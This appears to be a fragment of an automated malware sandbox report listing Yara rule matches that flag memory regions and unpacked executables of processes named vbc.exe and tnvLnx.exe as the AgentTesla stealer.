Source: Yara match	File source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE

Yara detected AgentTesla

Source: Yara match	File source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2367095229.00000000027E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tnvLnx.exe PID: 1664, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2908, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1980, type: MEMORY
Source: Yara match	File source: Process Memory Space: tnvLnx.exe PID: 152, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE